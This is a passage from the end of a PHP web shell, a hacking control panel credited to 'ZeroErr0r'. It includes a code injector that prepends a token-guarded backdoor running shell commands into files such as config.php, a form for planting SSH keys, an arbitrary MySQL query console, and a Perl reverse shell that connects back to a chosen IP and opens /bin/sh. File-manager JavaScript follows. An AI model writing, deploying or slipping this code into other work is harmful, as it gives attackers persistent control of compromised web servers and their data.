748 echo '<tr><td width="5%" style="background-color: #16A086;"><font color=white>open</font></td><td width="95%" style="background-color: #1A272E;">Port '.$i.'</td></tr>';
749 }
750 }
751 flush();
752 }
753 ?>
754 </table>
755 </div>
756 <?php } ?>
757
758 <!-- INJECTOR -->
759 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'injector') { ?>
760 <?php if (!isset($_GET['action'])) { ?>
761 <form action="" method="post" class="port_scanner">
762 <table>
763 <tr>
764 <td width="30%">Injectable File Path:</td>
765 <td width="70%"><input type="text" name="inject_path" value="<?php echo getcwd() . DIRECTORY_SEPARATOR . 'config.php'; ?>" autocomplete="off" spellcheck="false"></td>
766 </tr>
767 <tr>
768 <td width="30%">Code Type:</td>
769 <td width="70%"><select name="inject_code_type">
770 <option value="reverse_command">Reverse Command</option>
771 </select></td>
772 </tr>
773 <tr>
774 <td width="30%">Language:</td>
775 <td width="70%"><select name="inject_lang">
776 <option value="reverse_command">PHP</option>
777 </select></td>
778 </tr>
779 </table>
780 <input type="submit" name="inject" value="INJECT CODE!">
781 </form>
782 <?php if (isset($_POST['inject'])) { ?>
783 <pre class="result" style="font-size: 1.3rem;"><?php
784 $path = strip_tags($_POST['inject_path']);
785 $type = strip_tags($_POST['inject_code_type']);
786 $lang = strip_tags($_POST['inject_lang']);
787 $token = md5(rand(111111, 999999));
788 $code = '<?php function bdoor(){@session_start();if(isset($_SESSION["cd"])){chdir($_SESSION["cd"]);}if($_SERVER["REQUEST_METHOD"]=="POST"){$cmd=base64_decode($_POST["cmd"])." 2>&1";if($_POST["token"]!="' . $token . '"){echo"Error: invalid token!";die();}if(strpos($cmd,"cd")!==false){$tmp=explode(" ",$cmd);$direct=getcwd()."/".$tmp[array_search("cd",$tmp)+1];chdir($direct);$_SESSION["cd"]=$direct;}if(0==posix_getuid()){$sym="#";}else{$sym="$";}echo "{USER}".get_current_user()."{USER}"."{SERVER}".$_SERVER["SERVER_NAME"]."{SERVER}"."{SYMBOL}" . $sym . "{SYMBOL}" . "{PATH}".getcwd()."{PATH}".shell_exec($cmd);die();}}@bdoor(); ?>';
789 $pathinfo = pathinfo($path);
790 if (is_writable($pathinfo['dirname'])) {
791 if (!file_exists($path)) {
792 $file = fopen($path, 'w+');
793 fwrite($file, $code);
794 fclose($file);
795 } else {
796 $content = file_get_contents($path);
797 $content = $code . $content;
798
799 $file = fopen($path, "w");
800 fwrite($file, $content);
801 fclose($file);
802 }
803
804 echo "[+] Message: code has been injected!<br>";
805 echo "[+] Method: POST<br>";
806 echo "[+] URL: " . $_SERVER['HTTP_HOST'] . str_replace(str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $_SERVER['DOCUMENT_ROOT']), "", $path) . "<br>";
807 echo "[+] Variable: cmd<br>";
808 echo "[+] Token: " . $token;
809 } else { echo "[-] Error: permission denied!"; }
810 ?>
811 </pre><?php } ?>
812 <?php } else if (isset($_GET['action']) AND $_GET['action'] == 'ssh') { ?>
813 <form action="" method="post">
814 <textarea style="height: 200px;" name="pub_key" placeholder="Enter the public key here!"></textarea>
815 <input type="submit" name="inject_key" value="INJECT KEY!">
816 </form>
817 <?php } ?>
818
819
820 <!-- DATABASE -->
821 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'database') { ?>
822 <form action="?view=database" method="post" class="port_scanner">
823 <?php if (isset($_SESSION['mysql_user'])) { ?>
824 <select name="mysql_db">
825 <?php
826 $link = mysqli_connect($_SESSION['mysql_server'], $_SESSION['mysql_user'], $_SESSION['mysql_pass']);
827
828 if (!($result=mysqli_query($link,"show databases"))) {
829 printf("Error: %s\n", mysqli_error($link));
830 }
831
832 while( $row = mysqli_fetch_row( $result ) ){
833 if (isset($_POST['mysql_db'])) {
834 if ($row[0] == $_POST['mysql_db']) {
835 echo "<option value='" . $row[0] . "' selected>" . $row[0] . "</option>";
836 } else {
837 echo "<option value='" . $row[0] . "'>" . $row[0] . "</option>";
838 }
839 } else {
840 echo "<option value='" . $row[0] . "'>" . $row[0] . "</option>";
841 }
842 }
843 ?>
844 </select><br><br>
845 <textarea name="mysql_query" style="border: 1px solid #E3052B;height: 200px;box-sizing: border-box; padding: 20px;" placeholder="Query"><?php if (isset($_POST['mysql_query'])) { echo $_POST['mysql_query']; } ?></textarea>
846 <input type="submit" name="execute_mysql" value="EXECUTE QUERY!">
847 <?php } else { ?>
848 <table>
849 <tr>
850 <td width="20%">MySQL Server:</td>
851 <td width="80%"><input type="text" name="mysql_server" value="localhost" autocomplete="off" spellcheck="false"></td>
852 </tr>
853 <tr>
854 <td width="20%">User:</td>
855 <td width="80%"><input type="text" name="mysql_user" autocomplete="off" spellcheck="false"></td>
856 </tr>
857 <tr>
858 <td width="20%">Password:</td>
859 <td width="80%"><input type="text" name="mysql_pass" autocomplete="off" spellcheck="false"></td>
860 </tr>
861 </table><br>
862 <input type="submit" name="connect_mysql" value="CONNECT!">
863 </form>
864 <?php } ?>
865 <?php if (isset($_POST['connect_mysql'])) {
866 $server = $_POST['mysql_server'];
867 $user = $_POST['mysql_user'];
868 $pass = $_POST['mysql_pass'];
869
870 $link = mysqli_connect($server,$user,$pass);
871
872 if ($link) {
873 $_SESSION['mysql_user'] = $user;
874 $_SESSION['mysql_pass'] = $pass;
875 $_SESSION['mysql_server'] = $server;
876 echo "<script>document.location = '?view=database';</script>";
877 } else {
878 echo "<div class='result'>Could not connect, check the credential</div>";
879 }
880
881 // if (!($result=mysqli_query($link,$query))) {
882 // printf("Error: %s\n", mysqli_error($link));
883 // }
884
885 // while( $row = mysqli_fetch_row( $result ) ){
886 // if (($row[0]!="information_schema") && ($row[0]!="mysql")) {
887 // echo $row[0]."\r\n";
888 // }
889 // }
890
891 } ?>
892
893 <?php if (isset($_POST['execute_mysql'])) { ?>
894 <table class="result" style="overflow: auto;"><?php
895 $link = mysqli_connect($_SESSION['mysql_server'], $_SESSION['mysql_user'], $_SESSION['mysql_pass'], $_POST['mysql_db']);
896 $query = mysqli_query($link, $_POST['mysql_query']);
897 $row = mysqli_fetch_assoc($query);
898
899 echo "<tr>";
900 foreach ($row as $key => $value) {
901 echo "<td style='border: 2px dashed #555; padding: 5px;'>" . $key . "</td>";
902 }
903 echo "</tr>";
904
905 mysqli_data_seek( $query, 0 );
906 while( $row = mysqli_fetch_assoc( $query ) ) {
907 echo "<tr>";
908 foreach ($row as $key => $value) {
909 echo "<td style='border: 2px dashed #555; padding: 5px;'>" . $value . "</td>";
910 }
911 echo "</tr>";
912 }
913 ?></table>
914 <?php } ?>
915
916
917 <!-- NETWORKING -->
918 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'networking') { ?>
919
920 <div class="networking port_scanner">
921 <form action="" method="post" style="border: 1px solid #666;padding: 40px; background: #111;">
922 <h3 style="font-weight: normal;">Back Connect [Perl]</h3><br>
923 <table>
924 <tr>
925 <td>IP: <input type="text" name="ip" value="<?php echo $_SERVER['REMOTE_ADDR'] ?>" autocomplete="off" spellcheck="false" style="display: inline-block; width: auto; margin-right: 20px;">
926 Port: <input type="text" name="port" value="1337" autocomplete="off" spellcheck="false" style="display: inline-block; width: auto;">
927 <input type="submit" name="reverse_connect_perl" value="CONNECT!" style="margin: 0; padding: 9px 20px; margin-left: 30px;"></td>
928 </tr>
929 </table>
930 <?php
931 if (isset($_POST['reverse_connect_perl'])) {
932 ex('perl -e \'use Socket;$i="' . $_POST['ip'] . '";$p=' . intval($_POST['port']) . ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\' &');
933 echo "<br><pre>";
934 echo "+----------------------------------------------------+\n";
935 echo "| [INFO] connection established in the background! |\n";
936 echo "+----------------------------------------------------+\n\n";
937 echo ex("ps aux | grep perl");
938 echo "</pre>";
939 }
940 ?>
941 </form>
942 </div>
943
944
945 <?php } ?>
946 </div>
947</section>
948<footer>Copyright ©ZeroErr0r - <?php echo date('Y') ?></footer>
949
950<script type="text/javascript">
951 function rename(rename_path, file) {
952 var to = prompt("Enter a new file name", file);
953 console.log(to.length);
954 if (to !== null && to.length > 0) {
955 document.location = "?from=" + rename_path + "&to=" + to;
956 }
957 }
958
959 function touch(touch_path) {
960 var to = prompt("Enter a file name");
961 if (to !== null && to.length > 0) {
962 document.location = "?touch=" + touch_path + "&file=" + to;
963 }
964 }
965
966 function mkdir(mkdir_path) {
967 var to = prompt("Enter a folder name");
968 if (to !== null && to.length > 0) {
969 document.location = "?mkdir_path=" + mkdir_path + "&folder=" + to;
970 }
971 }
972
973 var file_select = document.getElementsByClassName('file_select');
974 function fileSelectCheck() {
975 showAction();
976 for (var i = 0; i < file_select.length; i++) {
977 if (file_select[i].checked) {
978 file_select[i].setAttribute('style', 'opacity:1;');
979 document.getElementsByClassName('file_select')[i].parentElement.parentElement.setAttribute('style', "background-color: #1A272E");
980 } else {
981 file_select[i].setAttribute('style', '');
982 document.getElementsByClassName('file_select')[i].parentElement.parentElement.setAttribute('style', '');
983 }
984 }
985 }
986
987 function filesDelete() {
988 var files = [];
989 var s = document.getElementsByClassName('file_select');
990 var c = 0;
991 for (var i = 0; i < s.length; i++) {
992 if (s[i].checked) {
993 files[c] = s[i].value;
994 c++;
995 }
996 }
997
998 var q = "", total = 1;
999 for (var i = 0; i < files.length; i++) {
1000 q += "rmfile" + i + "=" + files[i] + "&";
1001 total++;
1002 }
1003 document.location = "?" + q + "multirmfile=" + total;
1004 }
1005
1006 function filesCompress() {
1007 var files = [];
1008 var s = document.getElementsByClassName('file_select');
1009 var c = 0;
1010 for (var i = 0; i < s.length; i++) {
1011 if (s[i].checked) {
1012 files[c] = s[i].value;
1013 c++;
1014 }
1015 }
1016
1017 var q = "", total = 0;
1018 for (var i = 0; i < files.length; i++) {
1019 q += "file" + i + "=" + files[i] + "&";
1020 total++;
1021 }
1022 document.location = "?action=zip&" + q + "numfiles=" + total;
1023 }
1024
1025 function toggle(el) {
1026 if (el.nextSibling.nextSibling.getAttribute('class') == 'on') {
1027 el.nextSibling.nextSibling.setAttribute('class', 'off')
1028 } else {
1029 el.nextSibling.nextSibling.setAttribute('class', 'on')
1030 }
1031 }
1032</script>
1033<script>hljs.initHighlightingOnLoad();</script>
1034
1035</body>
1036</html>